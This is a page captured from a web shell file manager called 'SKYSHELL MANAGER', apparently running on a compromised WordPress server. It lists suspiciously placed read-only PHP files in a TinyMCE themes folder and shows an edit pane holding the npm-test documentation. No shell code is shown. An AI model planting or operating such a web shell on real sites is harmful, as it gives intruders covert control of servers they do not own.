📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: npm-test.md
--- title: npm-test section: 1 description: Test a package --- ### Synopsis <!-- AUTOGENERATED USAGE DESCRIPTIONS --> ### Description This runs a predefined command specified in the `"test"` property of a package's `"scripts"` object. ### Example ```json { "scripts": { "test": "node test.js" } } ``` ```bash npm test > npm@x.x.x test > node test.js (test.js output would be here) ``` ### Configuration <!-- AUTOGENERATED CONFIG DESCRIPTIONS --> ### See Also * [npm run-script](/commands/npm-run-script) * [npm scripts](/using-npm/scripts) * [npm start](/commands/npm-start) * [npm restart](/commands/npm-restart) * [npm stop](/commands/npm-stop)
Save